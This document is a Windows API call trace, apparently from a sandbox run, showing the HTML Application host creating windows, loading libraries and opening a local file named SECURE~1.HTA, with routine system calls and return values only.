[0037.591] CoCreateInstance (in: rclsid=0x7ffb233efaa0*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x7ffb233efa90*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7ffb238ec488 | out: ppv=0x7ffb238ec488*=0xb8a8c39740) returned 0x0
[0037.668] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0xb8a8c39740, aaClassList=0xb8a8a2f6d0*=0xc126, uSize=0x1) returned 0x0
[0037.668] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc126, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=585, hWndParent=0x50226, hMenu=0x0, hInstance=0x7ffb223a0000, lpParam=0xc0aab08000) returned 0x70064
[0037.669] SetWindowLongPtrW (hWnd=0x70064, nIndex=-21, dwNewLong=0xc0aab08000) returned 0x0
[0037.669] GetWindowLongW (hWnd=0x70064, nIndex=-20) returned 0
[0037.669] GetAncestor (hwnd=0x70064, gaFlags=0x2) returned 0x50226
[0037.669] GetWindowLongW (hWnd=0x50226, nIndex=-20) returned 262400
[0037.669] GetWindowLongW (hWnd=0x70064, nIndex=-20) returned 0
[0037.669] GetParent (hWnd=0x70064) returned 0x50226
[0037.669] GetWindowLongW (hWnd=0x50226, nIndex=-20) returned 262400
[0037.669] GetParent (hWnd=0x50226) returned 0x5016e
[0037.669] GetWindowLongW (hWnd=0x5016e, nIndex=-20) returned 256
[0037.669] GetParent (hWnd=0x5016e) returned 0x0
[0037.669] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x81, wParam=0x0, lParam=0xb8a8a2f070*=-1431273472, plResult=0xb8a8a2edf0 | out: plResult=0xb8a8a2edf0) returned 0x1
[0037.669] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x81, wParam=0x0, lParam=0xb8a8a2f070) returned 0x1
[0037.669] GetCurrentThreadId () returned 0x210
[0037.669] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0037.669] GetCurrentThreadId () returned 0x210
[0037.669] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0037.669] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x1, wParam=0x0, lParam=0xb8a8a2f070*=-1431273472, plResult=0xb8a8a2edf0 | out: plResult=0xb8a8a2edf0) returned 0x1
[0037.669] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x1, wParam=0x0, lParam=0xb8a8a2f070) returned 0x0
[0037.669] GetCurrentThreadId () returned 0x210
[0037.669] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0037.669] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x5, wParam=0x0, lParam=0x2490428, plResult=0xb8a8a2ee70 | out: plResult=0xb8a8a2ee70) returned 0x1
[0037.669] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x5, wParam=0x0, lParam=0x2490428) returned 0x0
[0037.669] GetCurrentThreadId () returned 0x210
[0037.669] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0037.670] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x3, wParam=0x0, lParam=0x0, plResult=0xb8a8a2ee70 | out: plResult=0xb8a8a2ee70) returned 0x1
[0037.670] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0
[0037.670] GetCurrentThreadId () returned 0x210
[0037.670] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x210, wParam=0x1, lParam=0x70064) returned 0x0
[0037.670] GetWindowRect (in: hWnd=0x70064, lpRect=0xb8a8a2f430 | out: lpRect=0xb8a8a2f430) returned 1
[0037.670] GetParent (hWnd=0x70064) returned 0x50226
[0037.670] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x50226, lpPoints=0xb8a8a2f430, cPoints=0x2 | out: lpPoints=0xb8a8a2f430) returned -10485898
[0037.670] GetClassNameW (in: hWnd=0x50226, lpClassName=0xb8a8a2f440, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34
[0037.670] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0037.670] GetCurrentThreadId () returned 0x210
[0037.670] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0xb8a8c39740, fRestoreLayout=1) returned 0x0
[0037.670] SendMessageW (hWnd=0x70064, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3
[0037.670] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0037.670] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x129, wParam=0x0, lParam=0x0, plResult=0xb8a8a2f500 | out: plResult=0xb8a8a2f500) returned 0x1
[0037.670] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3
[0037.670] GetCurrentThreadId () returned 0x210
[0037.670] LoadLibraryExW (lpLibFileName="ext-ms-win-ntuser-touch-hittest-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb3c650000
[0037.670] GetProcAddress (hModule=0x7ffb3c650000, lpProcName="RegisterTouchHitTestingWindow") returned 0x7ffb3c683cc0
[0037.670] RegisterTouchHitTestingWindow (hwnd=0x70064, value=0x1) returned 1
[0037.670] QISearch (in: that=0xc0aab10270, pqit=0x7ffb233fac20, riid=0x7ffb233fac40*(Data1=0xa5200748, Data2=0x18ae, Data3=0x4da5, Data4=([0]=0x93, [1]=0xaf, [2]=0x0, [3]=0x19, [4]=0x47, [5]=0x70, [6]=0x3, [7]=0xa1)), ppv=0xc0aab092b8 | out: that=0xc0aab10270, ppv=0xc0aab092b8*=0xc0aab10270) returned 0x0
[0037.670] IntersectRect (in: lprcDst=0xb8a8a2f778, lprcSrc1=0xc0aab040f0, lprcSrc2=0xc0aab04100 | out: lprcDst=0xb8a8a2f778) returned 1
[0037.670] EqualRect (lprc1=0xb8a8a2f778, lprc2=0xc0aab040f0) returned 1
[0037.671] InvalidateRect (hWnd=0x70064, lpRect=0x0, bErase=1) returned 1
[0037.672] GetCurrentProcessId () returned 0x700
[0037.672] ProcessIdToSessionId (in: dwProcessId=0x700, pSessionId=0xb8a8a2f600 | out: pSessionId=0xb8a8a2f600) returned 1
[0037.672] WTSGetActiveConsoleSessionId () returned 0x1
[0037.672] EnumDisplaySettingsW (in: lpszDeviceName=0x0, iModeNum=0xffffffff, lpDevMode=0xb8a8a2f650 | out: lpDevMode=0xb8a8a2f650) returned 1
[0037.672] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0037.672] GetCurrentThreadId () returned 0x210
[0037.677] memcpy_s (in: _Destination=0xb8a8a2e9a0, _DestinationSize=0xd70, _Source=0x7ffb238e94d0, _SourceSize=0xd70 | out: _Destination=0xb8a8a2e9a0) returned 0x0
[0037.736] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.736] GetProcAddress (hModule=0x7ffb3c9b0000, lpProcName=0x8) returned 0x7ffb3ca39e60
[0037.736] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e560 | out: lpflOldProtect=0xb8a8a2e560*=0x4) returned 1
[0037.893] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2f6a0 | out: lpPerformanceCount=0xb8a8a2f6a0*=403494842) returned 1
[0037.899] SetCoalescableTimer (hWnd=0x50210, nIDEvent=0x2002, uElapse=0x1f4, lpTimerFunc=0x0, uToleranceDelay=0x0) returned 0x2002
[0037.899] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0037.899] GetCurrentThreadId () returned 0x210
[0037.899] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2f470 | out: lpPerformanceCount=0xb8a8a2f470*=403514158) returned 1
[0037.899] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2f290 | out: lpPerformanceCount=0xb8a8a2f290*=403514281) returned 1
[0037.899] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e0
[0037.899] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ffb22474320, lpParameter=0xc0aab5c000, dwCreationFlags=0x0, lpThreadId=0xc0aab5c020 | out: lpThreadId=0xc0aab5c020*=0xcbc) returned 0x2dc
[0037.899] SetEvent (hEvent=0x2e0) returned 1
[0037.899] GetTickCount () returned 0x1bf72
[0037.899] WTSGetActiveConsoleSessionId () returned 0x1
[0037.899] QueryPerformanceFrequency (in: lpFrequency=0xb8a8a2f1f0 | out: lpFrequency=0xb8a8a2f1f0) returned 1
[0037.899] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2f1f8 | out: lpPerformanceCount=0xb8a8a2f1f8*=403516173) returned 1
[0037.899] _vsnwprintf (in: _Buffer=0xb8a8a2f300, _BufferCount=0x4f, _Format="VSyncHelper-%p-%I64x", _ArgList=0xb8a8a2f228 | out: _Buffer="VSyncHelper-000000B8A8C2F4D0-6d761da") returned 36
[0037.899] RegisterClassW (lpWndClass=0xb8a8a2f2b0) returned 0xc16f
[0037.899] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc16f, lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0xb8a8c2f4d0) returned 0x7016c
[0037.900] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0x0
[0037.900] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x24, wParam=0x0, lParam=0xb8a8a2ec40) returned 0x0
[0037.900] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0x0
[0037.900] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x81, wParam=0x0, lParam=0xb8a8a2ec10) returned 0x1
[0037.900] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0x0
[0037.900] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x83, wParam=0x0, lParam=0xb8a8a2ec60) returned 0x0
[0037.901] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0x0
[0037.901] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x1, wParam=0x0, lParam=0xb8a8a2ec10) returned 0x0
[0037.901] SetWindowLongPtrW (hWnd=0x7016c, nIndex=-21, dwNewLong=0xb8a8c2f4d0) returned 0x0
[0037.901] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e4
[0037.902] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x0, flProtect=0x8000004, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x28, lpName=0x0) returned 0x2e8
[0037.902] MapViewOfFile (hFileMappingObject=0x2e8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28) returned 0xc0aacb0000
[0037.902] GetSystemTimeAdjustment (in: lpTimeAdjustment=0xb8a8a2f0ec, lpTimeIncrement=0xb8a8a2f0e0, lpTimeAdjustmentDisabled=0xb8a8a2f0e8 | out: lpTimeAdjustment=0xb8a8a2f0ec, lpTimeIncrement=0xb8a8a2f0e0, lpTimeAdjustmentDisabled=0xb8a8a2f0e8) returned 1
[0037.902] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ec
[0037.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ffb226d27a0, lpParameter=0xb8a8c38510, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0
[0037.902] RegisterPowerSettingNotification (hRecipient=0x7016c, PowerSettingGuid=0x7ffb234de690, Flags=0x0) returned 0xb8a8c4b460
[0037.904] OpenProcess (dwDesiredAccess=0x100040, bInheritHandle=0, dwProcessId=0x700) returned 0x2f4
[0037.904] OpenThread (dwDesiredAccess=0x100040, bInheritHandle=0, dwThreadId=0x210) returned 0x2f8
[0037.904] GetProcessIdOfThread (Thread=0x2f8) returned 0x700
[0037.904] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0xb8a8a2f170 | out: lpdwProcessId=0xb8a8a2f170) returned 0x210
[0037.904] GetCurrentProcess () returned 0xffffffffffffffff
[0037.904] DuplicateHandle (in: hSourceProcessHandle=0x2f4, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xb8a8a2f180, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xb8a8a2f180*=0x2fc) returned 1
[0037.904] MapViewOfFile (hFileMappingObject=0x2fc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28) returned 0xc0aacc0000
[0037.904] GetCurrentProcess () returned 0xffffffffffffffff
[0037.904] DuplicateHandle (in: hSourceProcessHandle=0x2f4, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xb8a8c4acd0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xb8a8c4acd0*=0x300) returned 1
[0037.904] SetEvent (hEvent=0x2ec) returned 1
[0037.904] CloseHandle (hObject=0x2fc) returned 1
[0037.905] CloseHandle (hObject=0x2f4) returned 1
[0037.905] SetEvent (hEvent=0x2e4) returned 1
[0038.135] SetWindowPos (hWnd=0x70064, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1
[0038.135] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0038.135] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x46, wParam=0x0, lParam=0xb8a8a2f790*=458852, plResult=0xb8a8a2f540 | out: plResult=0xb8a8a2f540) returned 0x1
[0038.135] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x46, wParam=0x0, lParam=0xb8a8a2f790) returned 0x0
[0038.135] GetCurrentThreadId () returned 0x210
[0038.136] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0038.136] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x47, wParam=0x0, lParam=0xb8a8a2f790*=458852, plResult=0xb8a8a2f540 | out: plResult=0xb8a8a2f540) returned 0x1
[0038.136] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x47, wParam=0x0, lParam=0xb8a8a2f790) returned 0x0
[0038.136] GetCurrentThreadId () returned 0x210
[0038.136] SetTimer (hWnd=0x70064, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0038.136] GetFocus () returned 0x0
[0038.136] EnumChildWindows (hWndParent=0x70064, lpEnumFunc=0x7ffb22b7dae0, lParam=0xb8a8a2f330) returned 0
[0038.136] GetFocus () returned 0x0
[0038.137] SetFocus (hWnd=0x70064) returned 0x0
[0038.138] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x46, wParam=0x0, lParam=0xb8a8a2f660) returned 0x0
[0038.138] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x46, wParam=0x0, lParam=0xb8a8a2f660) returned 0x0
[0038.139] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x47, wParam=0x0, lParam=0xb8a8a2f660) returned 0x0
[0038.139] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x47, wParam=0x0, lParam=0xb8a8a2f660) returned 0x0
[0038.139] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x1c, wParam=0x1, lParam=0xc38) returned 0x0
[0038.139] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x1c, wParam=0x1, lParam=0xc38) returned 0x0
[0038.139] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0xb8a8c2f4d0
[0038.139] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x1c, wParam=0x1, lParam=0xc38) returned 0x0
[0038.139] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x1c, wParam=0x1, lParam=0xc38) returned 0x0
[0038.139] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1
[0038.144] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0038.144] LoadLibraryExA (lpLibFileName="OLEACC.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffb2cef0000
[0038.331] GetProcAddress (hModule=0x7ffb2cef0000, lpProcName="LresultFromObject") returned 0x7ffb2cf003c0
[0038.331] LresultFromObject () returned 0xc17d
[0038.413] GetCurrentThreadId () returned 0x210
[0038.418] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0038.418] GetKeyState (nVirtKey=1) returned 0
[0038.418] GetKeyState (nVirtKey=2) returned 0
[0038.418] GetKeyState (nVirtKey=16) returned 0
[0038.418] GetKeyState (nVirtKey=17) returned 0
[0038.418] GetKeyState (nVirtKey=4) returned 0
[0038.418] GetKeyState (nVirtKey=18) returned 0
[0038.418] GetMessageTime () returned 0
[0038.418] GetMessagePos () returned 0x0
[0038.418] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0xb8a8a2ea48 | out: plResult=0xb8a8a2ea48) returned 0x0
[0038.421] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0038.421] GetKeyState (nVirtKey=1) returned 0
[0038.421] GetKeyState (nVirtKey=2) returned 0
[0038.421] GetKeyState (nVirtKey=16) returned 0
[0038.421] GetKeyState (nVirtKey=17) returned 0
[0038.421] GetKeyState (nVirtKey=4) returned 0
[0038.421] GetKeyState (nVirtKey=18) returned 0
[0038.421] GetMessageTime () returned 0
[0038.421] GetMessagePos () returned 0x0
[0038.421] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x282, wParam=0x2, lParam=0x0, plResult=0xb8a8a2dec8 | out: plResult=0xb8a8a2dec8) returned 0x0
[0038.421] GetCurrentThreadId () returned 0x210
[0038.421] GetCurrentThreadId () returned 0x210
[0038.421] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0038.422] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0xb8a8c39740, hWnd=0x70064, phIMC=0xb8a8a2eef0 | out: phIMC=0xb8a8a2eef0*=0x1a00f1) returned 0x0
[0038.422] GetCursorPos (in: lpPoint=0xb8a8a2ead0 | out: lpPoint=0xb8a8a2ead0*(x=1287, y=746)) returned 1
[0038.422] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2ead0 | out: lpPoint=0xb8a8a2ead0) returned 1
[0038.422] GetKeyState (nVirtKey=16) returned 0
[0038.422] GetKeyState (nVirtKey=17) returned 0
[0038.422] GetKeyState (nVirtKey=18) returned 0
[0038.422] GetKeyState (nVirtKey=160) returned 0
[0038.422] GetKeyState (nVirtKey=162) returned 0
[0038.422] GetKeyState (nVirtKey=164) returned 0
[0038.422] GetCursorPos (in: lpPoint=0xb8a8a2ead0 | out: lpPoint=0xb8a8a2ead0*(x=1287, y=746)) returned 1
[0038.422] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2ead0 | out: lpPoint=0xb8a8a2ead0) returned 1
[0038.422] GetKeyState (nVirtKey=16) returned 0
[0038.422] GetKeyState (nVirtKey=17) returned 0
[0038.422] GetKeyState (nVirtKey=18) returned 0
[0038.422] GetKeyState (nVirtKey=160) returned 0
[0038.422] GetKeyState (nVirtKey=162) returned 0
[0038.422] GetKeyState (nVirtKey=164) returned 0
[0038.422] GetCapture () returned 0x0
[0038.423] memcpy_s (in: _Destination=0xc0aaadc6a0, _DestinationSize=0x18, _Source=0xb8a8a2e208, _SourceSize=0x18 | out: _Destination=0xc0aaadc6a0) returned 0x0
[0038.423] GetCurrentThreadId () returned 0x210
[0038.424] GetCurrentThreadId () returned 0x210
[0038.424] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0038.424] GetCurrentThreadId () returned 0x210
[0038.424] GetKeyState (nVirtKey=1) returned 0
[0038.424] GetKeyState (nVirtKey=2) returned 0
[0038.424] GetKeyState (nVirtKey=16) returned 0
[0038.424] GetKeyState (nVirtKey=17) returned 0
[0038.424] GetKeyState (nVirtKey=4) returned 0
[0038.424] GetKeyState (nVirtKey=18) returned 0
[0038.424] GetMessageTime () returned 0
[0038.424] GetMessagePos () returned 0x0
[0038.424] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x7, wParam=0x0, lParam=0x0, plResult=0xb8a8a2edc8 | out: plResult=0xb8a8a2edc8) returned 0x1
[0038.424] NtdllDefWindowProc_W (hWnd=0x70064, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0
[0038.425] LoadLibraryExW (lpLibFileName="mshtml.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb223a0000
[0038.425] LoadLibraryExW (lpLibFileName="mshtml.dll", hFile=0x0, dwFlags=0x60) returned 0x7ffb223a0000
[0038.425] LoadStringW (in: hInstance=0x7ffb223a0000, uID=0xb5, lpBuffer=0xb8a8a2f600, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0038.438] LoadStringW (in: hInstance=0x7ffb223a0000, uID=0xb5, lpBuffer=0xb8a8a2f6f0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0038.438] LoadStringW (in: hInstance=0x7ffb223a0000, uID=0xb5, lpBuffer=0xb8a8a2f6c0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0038.438] GetWindowThreadProcessId (in: hWnd=0x50210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0038.438] GetCurrentThreadId () returned 0x210
[0038.438] ShowWindow (hWnd=0x70064, nCmdShow=1) returned 1
[0038.438] IUnknown:Release (This=0xb8a8c15f50) returned 0x1
[0038.438] GetMessageW (in: lpMsg=0xb8a8a2fbd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb8a8a2fbd0) returned 1
[0038.438] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0xb8a8c2f4d0
[0038.438] SetEvent (hEvent=0x2ec) returned 1
[0038.438] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x218, wParam=0x8013, lParam=0xb8a8c75f40) returned 0x1
[0038.438] TranslateMessage (lpMsg=0xb8a8a2fbd0) returned 0
[0038.438] DispatchMessageW (lpMsg=0xb8a8a2fbd0) returned 0x0
[0038.438] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0
[0038.438] GetMessageW (in: lpMsg=0xb8a8a2fbd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb8a8a2fbd0) returned 1
[0038.438] TranslateMessage (lpMsg=0xb8a8a2fbd0) returned 0
[0038.438] DispatchMessageW (lpMsg=0xb8a8a2fbd0) returned 0x0
[0038.438] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0
[0038.438] GetMessageW (in: lpMsg=0xb8a8a2fbd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb8a8a2fbd0) returned 1
[0038.438] TranslateMessage (lpMsg=0xb8a8a2fbd0) returned 0
[0038.438] DispatchMessageW (lpMsg=0xb8a8a2fbd0) returned 0x0
[0038.439] CreateUri (in: pwzURI="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwFlags=0x1002b85, dwReserved=0x0, ppURI=0xb8a8a2e130 | out: ppURI=0xb8a8a2e130*=0xb8a8c431a0) returned 0x0
[0038.439] IUnknown:QueryInterface (in: This=0xb8a8c431a0, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2e0b0 | out: ppvObject=0xb8a8a2e0b0*=0xb8a8c431a0) returned 0x0
[0038.439] IUnknown:Release (This=0xb8a8c431a0) returned 0x8
[0038.440] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x9
[0038.440] IUnknown:Release (This=0xb8a8c431a0) returned 0x8
[0038.440] IUnknown:Release (This=0xb8a8c431a0) returned 0x7
[0038.440] FindResourceExW (hModule=0x7ffb223a0000, lpType=0x6, lpName=0x1fe, wLanguage=0x0) returned 0xc0ab401d40
[0038.440] LoadResource (hModule=0x7ffb223a0000, hResInfo=0xc0ab401d40) returned 0xc0ab407e88
[0038.440] LockResource (hResData=0xc0ab407e88) returned 0xc0ab407e88
[0038.440] VirtualQuery (in: lpAddress=0xc0ab407e88, lpBuffer=0xb8a8a2f200, dwLength=0x30 | out: lpBuffer=0xb8a8a2f200*(BaseAddress=0xc0ab407000, AllocationBase=0xc0ab400000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x34000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
[0038.440] SizeofResource (hModule=0x7ffb223a0000, hResInfo=0xc0ab401d40) returned 0x1be
[0038.441] SetEvent (hEvent=0x15c) returned 1
[0038.441] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0038.441] GetProcAddress (hModule=0x7ffb3cb20000, lpProcName="RegisterDragDrop") returned 0x7ffb3cb2e820
[0038.441] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f730 | out: lpflOldProtect=0xb8a8a2f730*=0x4) returned 1
[0038.441] RegisterDragDrop (hwnd=0x70064, pDropTarget=0x7ffb238e5da8) returned 0x0
[0038.765] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0038.765] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x8
[0038.765] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.765] IInternetSecurityManager:MapUrlToZone (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pdwZone=0xb8a8a2f3c0, dwFlags=0x0 | out: pdwZone=0xb8a8a2f3c0*=0xffffffff) returned 0x800c0011
[0038.765] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.765] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.765] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.765] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0xb8a8c38780, pUri=0xb8a8c431a0, dwAction=0x1400, pPolicy=0xb8a8a2f3b0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0xb8a8a2f3f0 | out: pPolicy=0xb8a8a2f3b0*=0x0, pdwOutFlags=0xb8a8a2f3f0*=0x0) returned 0x0
[0038.765] IInternetSecurityManager:ProcessUrlAction (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwAction=0x1400, pPolicy=0xb8a8a2f3b0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0xb8a8a2f3b0*=0x0) returned 0x0
[0038.765] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.765] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0038.765] IUnknown:Release (This=0xb8a8c431a0) returned 0x7
[0038.765] ParseURLW (in: pcszURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", ppu=0xb8a8a2f460 | out: ppu=0xb8a8a2f460) returned 0x0
